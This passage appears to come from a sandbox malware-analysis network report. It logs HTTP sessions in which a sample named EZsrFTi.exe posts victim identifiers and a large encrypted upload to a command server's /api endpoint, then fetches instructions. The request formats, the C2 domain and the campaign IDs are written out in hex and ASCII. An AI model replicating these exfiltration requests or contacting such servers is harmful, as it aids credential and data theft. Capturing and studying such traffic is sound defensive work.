--G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="pid"3--G7J5MQQ4QJR3QLITMQSContent-Disposition: form-data; name="lid"yau6Na--73
2025-01-15 17:11:10 UTC	5108	OUT	Data Raw: 00 00 00 00 00 00 00 60 93 eb 8b 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 Data Ascii: `M?lrQM/64G6(X&~`aO
2025-01-15 17:11:11 UTC	1130	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mi65k408msmol3r8c8j7ta2o5i; expires=Sun, 11 May 2025 10:57:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppmG9F4PV%2FuBb5AwCg%2B8ynmf1GyexoQ3mgWAJVGWMIvRkBXGt2YS2w2C%2FW%2FDG1LDTU8DesYLc7vHUgmYCGk6cnUkw3Za35izymqjOVBWxGaNvXIddGml4W859Z1OgIQRCqU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bc47a9c4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1714&rtt_var=712&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21401&delivery_rate=1466599&cwnd=180&unsent_bytes=0&cid=aecc040b960119b8&ts=1240&x=0"
2025-01-15 17:11:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 17:11:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49742	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:12 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IFG25ELB7RX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1343 Host: sobrattyeu.bond
2025-01-15 17:11:12 UTC	1343	OUT	Data Raw: 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 0d 0a 2d 2d 49 46 47 32 35 45 4c 42 37 52 58 0d Data Ascii: --IFG25ELB7RXContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--IFG25ELB7RXContent-Disposition: form-data; name="pid"1--IFG25ELB7RXContent-Disposition: form-data; name="lid"yau6Na--7329910690--IFG25ELB7RX
2025-01-15 17:11:13 UTC	1124	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j6bdn75oiranuda7rvslr6ho4p; expires=Sun, 11 May 2025 10:57:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVJyHBwUQlgJjJdo79E1NT7ubrMRKUhpQMxA2BeGl%2BSXuefJ42ugGNWe34AZYmgZL%2FKNDk1d4IDTZcoNiQjTp9PVate5Ns44ijOZlg6iJl0heMiucIYX3wiw6W12%2BXv6XCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bd1cf4a7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1941&rtt_var=750&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2252&delivery_rate=1504379&cwnd=218&unsent_bytes=0&cid=33da2e16acd18b8d&ts=566&x=0"
2025-01-15 17:11:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 17:11:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49750	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=13F9SI98ZYOYF9V467 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570166 Host: sobrattyeu.bond
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 33 46 39 53 49 39 38 5a 59 4f 59 46 39 56 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 Data Ascii: --13F9SI98ZYOYF9V467Content-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--13F9SI98ZYOYF9V467Content-Disposition: form-data; name="pid"1--13F9SI98ZYOYF9V467Content-Disposition: form-data; name="lid"yau6Na--73299
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 8f bd 72 23 4b 18 82 3d 50 63 2d 07 61 52 26 54 ba e1 56 be 81 01 c2 23 32 cb 59 04 01 a1 43 ef 5f 28 4f 62 04 0b 7a 9f b6 61 26 c4 db 4f e1 72 f9 a9 a5 e8 41 4e 60 96 be e9 64 0d 48 de 9d 73 ea 43 6f e2 95 ee 88 6f 5f 38 4c 56 a6 21 a5 e8 07 12 5b 4d 15 a3 35 ba 55 44 e0 6e f3 59 a3 57 30 17 a1 59 f9 96 76 21 df 14 ad ca 27 1c 79 00 79 73 e0 c2 43 ae 82 48 81 84 79 1e 10 a7 84 81 71 3b d8 cd 5e ae 1d bd 03 73 16 9b bd 07 40 e5 dc ca ff 62 e8 7f 37 db c0 23 bb 1d b8 e2 41 8c 3e 25 cf 17 30 e2 78 c0 39 d8 3f 22 18 c7 f9 43 ba d6 de 77 e6 10 66 53 3e 98 f5 86 1b 75 9f 36 f9 34 65 9b 0b 08 d7 d2 03 40 47 f9 ce dc 35 5d a0 31 f7 42 e9 67 57 b8 86 ca 40 a4 0b bd 56 92 70 72 d9 5e 02 7d e5 b3 7d ab 98 55 ce 1c 7a 81 12 0b 39 7f 91 f1 d8 0c 1e df 3a cd 4e f9 22 Data Ascii: r#K=Pc-aR&TV#2YC_(Obza&OrAN`dHsCoo_8LV![M5UDnYW0Yv!'yysCHyq;^s@b7#A>%0x9?"CwfS>u64e@G5]1BgW@Vpr^}}Uz9:N"
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 70 23 38 71 10 20 aa 95 08 33 5d d8 97 c8 79 0c 4c 94 23 e0 78 ab 11 d8 b6 7e 73 96 ab 11 5e 38 6a fe 29 4e 5f 5b b5 a3 7c ab 8f 2d 21 bf 42 4d 49 ba 30 26 0a 26 02 37 f3 5e 5d 7c 92 cb 7d 00 eb 73 46 95 fd 68 3f 7d 66 09 dd cc 1a 37 74 66 1a e8 5a ac e9 fb 35 fb a9 38 64 b4 81 4f 58 19 4e 0c 07 c3 55 35 7f 44 3e 0c 86 bd 03 46 13 83 1a 32 5e 2a 0a 3e fc 12 81 c6 0c cd 3f 6c 8d cd 4a 68 6b bc 2f c4 3b 90 38 f2 aa 34 5f 71 ad a0 c0 7c f4 26 d7 e9 7b 74 65 45 f0 f2 24 4e 32 6f 57 cf 08 e6 d8 43 f5 9d fb e2 0f 2b 60 65 05 5b 25 c3 6e f7 47 85 e9 a5 a0 17 f4 7b d6 9d 6d 43 79 20 fa bd 1b 87 a8 dc db 57 77 3f db bb 7a d8 97 dd ad ae 58 a8 35 1e 0e e7 d3 9b 92 f6 63 40 cc f4 9a 90 ae 3f 53 74 be d4 d3 b7 14 d1 14 4a 8d c4 dd aa af b6 21 5f 9e 2e a4 78 b5 79 be Data Ascii: p#8q 3]yL#x~s^8j)N_[\|-!BMI0&&7^]\|}sFh?}f7tfZ58dOXNU5D>F2^*>?lJhk/;84_q\|&{teE$N2oWC+`e[%nG{mCy Ww?zX5c@?StJ!_.xy
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: e4 7f bf 7c 2d 2b 99 da 34 bc 6b ca 10 a0 b5 a1 02 73 9e 43 52 70 d7 bb ca 85 45 ab 5d 9f 06 62 36 25 be eb 37 af b7 de 32 e7 fb 07 40 aa 80 f5 80 2b 5c f5 d3 65 17 c9 6c ad f4 5f ff 80 08 92 b5 56 75 e3 35 a6 04 db 7e 3d 9c 55 9a ba fa 75 8a 19 3e 78 7d a6 75 7f 75 e6 23 69 d8 49 c1 69 23 c0 d8 62 c1 e8 f1 52 41 ae 05 99 a2 38 8e 11 c2 e0 67 fe 83 db 2f e8 43 14 2a 99 16 c2 03 4b 60 84 8e 81 6e 01 81 99 b8 cb f1 36 62 25 56 47 04 90 a5 81 b2 18 af 40 30 4e 16 31 af e3 53 7c 4e 6a 8e c0 d4 7e 30 a3 b7 b9 f2 e2 3d 0e 14 69 84 ef 4b 2e ad 50 2a 42 81 bd fc 80 17 f2 15 43 40 4b f0 8f 66 4c 21 96 d8 f9 d3 5a 18 48 bc f3 1d 8c fe 39 36 70 41 1e be 67 69 71 44 05 f9 4a ff d3 a7 fa 33 0d 12 b6 75 ee db ad 2a b0 8f ea 6c 4c c8 ad e3 f0 00 8a 0a 4f 52 f2 cb 6e 75 Data Ascii: \|-+4ksCRpE]b6%72@+\el_Vu5~=Uu>x}uu#iIi#bRA8g/CK`n6b%VG@0N1S\|Nj~0=iK.PBC@KfL!ZH96pAgiqDJ3u*lLORnu
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 59 00 78 81 34 f3 8d 18 8f 28 f8 84 3f 9a 51 23 d3 d3 d1 ad 56 43 64 4e 4c f0 97 02 fd dd 1f 19 10 cc 27 a0 0a 5e 7f b0 1c 87 ce f0 61 57 9e ff a8 4a 1a 41 a6 60 cb 7c c1 4f c7 5a 64 f4 23 a8 89 e2 78 4f 6d 04 27 ec c1 86 14 cb db 40 69 ee a0 d8 4d eb f9 6f e1 58 52 ad 11 30 a0 6d 9d 9a 48 7d c9 35 b3 32 8f 4c 2d 66 f7 36 69 30 ed f2 cd 51 5c 1b 70 d9 82 4c c0 5e 5b c0 41 8a f6 54 40 8d 42 6d 13 40 6d fc dc 89 c7 e3 5d f1 2e 44 5a 3f 23 29 af c7 d8 80 4c d2 db 94 9a c5 d2 95 47 9d 0d 6c b6 ca 28 13 95 b6 bf a1 59 1a cb f6 53 25 4a 9e 22 48 65 67 93 74 b0 04 78 bf 14 07 e2 0b 30 fe b7 a1 34 3d 9e 80 4e cc 68 04 85 92 d5 93 a0 e9 98 cc 6d 7c 1e 82 81 1f e1 bd d4 14 93 a9 de a8 f7 5e ea 62 9b e7 3d a4 42 3d 0c be 33 e6 2b 3f 31 c5 67 6c e9 2e b2 0f f7 ca 0a Data Ascii: Yx4(?Q#VCdNL'^aWJA`\|OZd#xOm'@iMoXR0mH}52L-f6i0Q\pL^[AT@Bm@m].DZ?#)LGl(YS%J"Hegtx04=Nhm\|^b=B=3+?1gl.
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: d0 64 2a 70 e4 e7 76 ef d3 03 6d 68 6b 81 de b4 02 b1 72 6c 91 de db b1 5a bb 68 79 29 55 95 3b 38 61 f3 2b 91 45 22 5c 08 61 24 fc b2 80 60 53 95 22 13 de 89 20 98 38 eb 93 5c 23 0f 9d f0 60 9a 95 f2 68 bf 35 29 26 99 24 da 8b 98 50 23 3c 61 e5 6e 7f 50 25 26 2a 0e ed 7d 4a 6e 05 37 6e 21 3e 30 3e 1e 52 ae 9a ef e3 46 4a 53 79 14 93 4f f9 6a 61 11 28 fe 6b 47 dd 0d c6 01 ed fa 10 e3 ca 04 f8 9e ff 5a c0 a3 34 23 c4 a7 8e 9b 2b 7d 9f 1c 37 1d 1f 94 c8 bb 6c 5b e7 c8 a2 fa c8 95 38 44 cf 59 82 af 70 f1 02 4f 6e bd ed 0f 41 df bd 89 69 50 13 0e 2d 4b 8d 34 43 75 32 d4 d4 43 e2 b1 46 ab 9d db 72 7e 93 3a ef 4a 60 6b 1d 74 2b cd 13 05 40 a4 3d 30 56 2f 6e de c9 7e e0 54 b1 fe 8e bf ab 02 96 55 94 45 2e 09 5b 9f 08 c9 2f c5 3b 02 04 b5 6e 01 d7 30 5d 66 5a 5d Data Ascii: dpvmhkrlZhy)U;8a+E"\a$`S" 8\#`h5)&$P#<anP%&}Jn7n!>0>RFJSyOja(kGZ4#+}7l[8DYpOnAiP-K4Cu2CFr~:J`kt+@=0V/n~TUE.[/;n0]fZ]
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: d1 00 26 bb f4 d4 24 c9 47 c7 98 75 c8 1a 4b c2 8e b9 1b fb 0b 5b 4c 4c 33 23 1d 5d 38 e9 cf 88 9d 8e 0f 7f 6e 71 49 fd 16 75 62 e7 d0 45 a1 e7 94 f3 41 67 d4 fe 69 20 c4 e5 1e 61 75 b7 19 a7 38 75 4c 5f bb d6 28 ff d2 db bd fc c7 9b 07 6f 52 28 9f 73 dd 72 4f a9 10 ca 2e db bf d5 88 69 8d 65 52 d7 43 74 42 48 0e 2b 4e 2f c7 ef c8 96 bf cd e8 ff 11 a6 be f6 e0 71 9c 9b dc 91 2f 88 af ed 41 a9 c4 23 33 57 83 f6 6b 8a 28 5e d8 67 b0 56 a3 b7 7f c9 e5 f8 4c de e3 ec 85 a2 91 b5 36 4f cc 99 29 8d c6 b8 53 29 08 48 a4 fd e4 16 35 07 21 ec dd 86 c0 8a c4 ff 8a a1 0e 46 78 86 1a ed 7e 77 da c6 69 f7 cb 61 a3 c2 27 84 b8 da eb 7f 0b fe 39 d9 e1 a6 34 f9 a0 52 bd bc 98 7c 7f fc 81 cd b2 8b 1d c1 20 ca 8c 97 dd 7d 99 3e 2d 9c d7 fe aa 32 e0 e9 91 d9 37 c7 ff 88 14 Data Ascii: &$GuK[LL3#]8nqIubEAgi au8uL_(oR(srO.ieRCtBH+N/q/A#3Wk(^gVL6O)S)H5!Fx~wia'94R\| }>-27
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 1f 7e 0a 63 97 3f b5 8d 39 21 ef 4b 29 c6 6b 97 15 49 03 3e a6 cc 3d 12 0b f5 5b 1e a2 d8 f1 7e 1b 2a 15 71 8a e5 ec 14 22 0b 55 b6 16 f5 9f 83 73 67 18 01 bc 92 fa 89 06 69 ca 43 da 78 60 1c bf ca f7 0b 20 c2 f9 c1 b6 e4 71 26 7a be fd 19 01 1b 9b 2a ea 21 48 42 c4 54 1f c2 a2 1a 1f d1 e2 f9 24 36 7c 6f 94 89 8e f5 f7 eb be 28 a5 04 ae fd fc 4c 49 c0 16 69 3c df e1 0f 7e b2 2d 89 71 81 06 18 7f 11 b2 c7 2c 37 e8 79 a0 f2 20 3b 8a 7a 1a df b8 28 aa c7 fb fc fb 17 8a 6c 62 64 42 4a 40 bf 89 4a 4e ac 39 b8 a4 6d 42 96 a6 eb ac 08 b6 22 c1 39 81 96 45 27 25 a0 3c a7 65 b4 c8 4c 23 e7 76 39 8f f4 48 01 ee b8 78 71 11 f2 cd c4 a7 a1 ad 5d ec 9c 77 c3 56 63 7c 67 e3 56 ae 17 c6 26 6c 9a 60 68 d1 a1 18 b8 94 18 cd 39 24 ff b6 e5 57 30 35 d9 77 e4 a7 67 0c ac 1f Data Ascii: ~c?9!K)kI>=[~q"UsgiCx` q&z!HBT$6\|o(LIi<~-q,7y ;z(lbdBJ@JN9mB"9E'%<eL#v9Hxq]wVc\|gV&l`h9$W05wg
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 37 e8 f7 a1 27 51 be 86 d5 3d 9a 48 70 ba 71 ad 38 65 89 87 64 11 02 a1 77 93 8a 95 c2 d3 e6 52 3c d7 77 10 7e cb a7 c1 84 ce 80 0c 15 28 ab 14 f5 c1 d8 65 17 5e 23 9b e9 0d e2 7e 46 24 a3 c8 28 12 36 1a 8e d4 3b 6c b4 a1 5d 22 82 a4 be 06 f8 c6 bf 93 f9 14 43 c4 50 48 8c 96 cd 8c 1f 40 4d 8b 7d 17 5b ff 79 d3 d9 7b 61 e4 28 89 6e 5c e5 3e b6 79 0d 5d f0 f0 0e cb 7f c6 bd fb 2a eb 7f f7 c4 db 00 75 f4 c7 01 a1 ff bb f3 62 2c 57 4c b0 03 0a e6 c7 1c 9f b7 3d c3 07 b6 89 bc bd 7e 04 7b 51 6b 1b d1 5a ca 9d ff c2 57 b3 7e fc bb da 73 1e d2 9f 8d 3e c6 8a b9 a2 98 b2 9c f3 5b fd 73 94 21 65 14 13 79 e7 fa 36 e6 3f 5b 05 d8 06 02 9c 47 50 dc cf 48 eb 54 74 6e c1 5c 59 b3 67 f3 a6 db 86 8c af 0b 7c b4 3e c4 bf 8d a2 c0 39 0f f4 c4 fb 22 e5 39 3b 80 99 7e 5c 5e Data Ascii: 7'Q=Hpq8edwR<w~(e^#~F$(6;l]"CPH@M}[y{a(n\>y]*ub,WL=~{QkZW~s>[s!ey6?[GPHTtn\Yg\|>9"9;~\^
2025-01-15 17:11:14 UTC	15331	OUT	Data Raw: 33 75 99 75 a4 40 39 ce 30 a9 bb 81 4a f5 79 e0 5b bc 65 3d 31 cf fd 09 0d c8 18 d2 91 0b aa f2 43 2e 0b ca 3c 93 cc a0 68 6a 09 2f 61 19 78 0f 44 c9 05 52 19 81 6d a5 e7 8a 33 c6 84 ca c6 bf bf 43 01 c7 f1 e1 a1 a1 64 6e d2 45 a6 6e d5 5a 72 2d 85 d3 b0 63 e9 c4 4b 3a 02 c5 15 fd ad 2e 03 1b e5 06 0f 01 c5 1b 1a e4 07 6b 3c c5 6f 10 a0 5a da 01 76 5a 01 8c 43 5c 37 91 59 79 bd 36 25 3f f3 27 28 94 c3 68 95 44 79 95 01 7a a0 0e 44 47 8d 54 ef f8 ba 95 82 84 01 d5 9b 2d cc d6 5f ed 71 99 0f ac de 4c 2f 5f 6a d5 1d 28 d6 ff df e8 30 37 a4 bd 13 03 ad 92 4a ff db 00 3d 2b 0a 56 f9 21 37 5d 90 d7 8a e9 ef da 8b e3 aa 89 0f 3c 0a 7f 1d e3 f9 d5 56 ac bc 7b 77 e3 90 9a dc 09 7f af 46 ac e4 9a 6f 7b 23 cf 8e ef b9 c4 ef 26 80 47 99 cc 88 b9 51 9f 59 c6 be 74 9e Data Ascii: 3uu@90Jy[e=1C.<hj/axDRm3CdnEnZr-cK:.k<oZvZC\7Yy6%?'(hDyzDGT-_qL/_j(07J=+V!7]<V{wFo{#&GQYt
2025-01-15 17:11:16 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3322r7t52n7jm1rarkfcf8d3n4; expires=Sun, 11 May 2025 10:57:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhmXwAQwGnLh9XOBCeeQFSezvFvfLrlecb512jYACYxwCxkAN9eOiGRhYn8b%2BWbBcXoyBzBtAdzRW7hhJEfXYIqq7JR5hjrEsC0hQccJK1jN4iluUgddztnBBkltUmX6G8s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bdaaf0b8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1929&rtt_var=746&sent=199&recv=590&lost=0&retrans=0&sent_bytes=2836&recv_bytes=572712&delivery_rate=1444829&cwnd=168&unsent_bytes=0&cid=792eb50bfe1fcece&ts=1950&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49769	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: sobrattyeu.bond
2025-01-15 17:11:16 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 26 6a 3d 26 68 77 69 64 3d 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7329910690&j=&hwid=E2AD60005361D2860522D5E87E3CC394
2025-01-15 17:11:17 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fvgvbo1u6nmcb4m6bubd7q55u8; expires=Sun, 11 May 2025 10:57:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSUgxCNe%2FbbC1ab%2BELm4Nb03mxUj1FPJyxk4gdgSHdGiygrGk%2Bl1LmWRKkQmbRiyjh9nyDXGrIB7Qn18JSe4Ua2E7Yyq%2BPoDsDh1IYEvQhZs17yON%2BeLAJt82KkHFk%2FZivw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277be9cf9c4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1705&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=986&delivery_rate=1690793&cwnd=180&unsent_bytes=0&cid=77a79172396ffe26&ts=789&x=0"
2025-01-15 17:11:17 UTC	240	IN	Data Raw: 33 36 65 34 0d 0a 31 63 34 6b 31 64 77 71 58 6f 56 66 4b 75 73 39 57 6c 46 59 30 64 2f 33 36 66 71 74 59 58 32 4b 2f 63 37 41 54 6a 74 73 70 6b 65 4f 74 51 61 7a 71 41 68 6b 74 48 4d 49 6a 68 39 67 59 48 54 7a 75 39 58 54 32 4f 6b 67 4f 76 79 4e 70 62 41 4b 44 43 62 63 47 2f 72 6c 61 49 47 57 45 32 37 33 4d 78 6a 53 56 6d 38 53 43 70 79 34 72 37 75 4e 2b 68 4d 71 7a 34 58 37 6d 67 67 4f 52 35 35 2b 6c 35 6b 64 73 4c 46 35 62 74 55 73 52 4c 74 4c 62 69 55 56 76 2b 79 6b 6e 4b 4c 50 55 79 6e 68 74 34 75 35 44 46 38 6b 35 43 57 68 6c 33 43 64 73 45 45 47 36 32 68 51 6e 45 6f 59 49 32 36 4c 6c 4b 62 43 67 38 34 39 55 74 62 53 70 2f 41 33 58 51 6a 74 63 72 47 34 66 70 71 4e 51 51 72 4d 47 52 71 49 65 79 74 67 4d 4a Data Ascii: 36e41c4k1dwqXoVfKus9WlFY0d/36fqtYX2K/c7ATjtspkeOtQazqAhktHMIjh9gYHTzu9XT2OkgOvyNpbAKDCbcG/rlaIGWE273MxjSVm8SCpy4r7uN+hMqz4X7mggOR55+l5kdsLF5btUsRLtLbiUVv+yknKLPUynht4u5DF8k5CWhl3CdsEEG62hQnEoYI26LlKbCg849UtbSp/A3XQjtcrG4fpqNQQrMGRqIeytgMJ
2025-01-15 17:11:17 UTC	1369	IN	Data Raw: 79 36 72 35 6d 66 79 78 63 74 79 35 58 36 6c 6a 39 2b 48 70 56 79 67 34 5a 42 68 4a 42 39 47 4d 6f 79 58 35 4e 4f 62 52 4d 54 6d 6f 69 35 75 72 66 44 46 52 62 77 76 4c 6d 53 4a 6b 30 74 2f 69 75 30 6a 42 43 63 76 78 6b 61 35 44 56 74 73 51 55 75 65 67 72 6a 71 70 71 54 75 4d 38 44 53 76 36 37 6c 4c 51 71 58 46 6d 54 44 35 65 73 48 5a 2b 59 59 6a 4b 32 42 30 43 33 45 69 41 72 4d 4b 47 6e 7a 36 2b 78 2f 45 6f 45 36 61 48 68 6e 47 46 53 58 4e 38 56 73 59 55 52 69 66 4e 59 44 63 6f 65 53 62 39 30 48 32 45 37 6c 36 37 47 6d 37 66 49 4e 69 2f 76 6d 37 69 51 43 6e 6b 72 30 44 65 2b 76 6e 44 69 6c 6c 41 43 71 6e 52 6d 76 33 64 6a 59 53 71 39 70 73 36 43 69 75 34 7a 4d 4f 32 6c 74 72 63 5a 53 6c 37 6a 50 2b 43 55 59 75 44 33 45 6d 62 4f 48 6b 76 41 55 41 6b 36 43 Data Ascii: 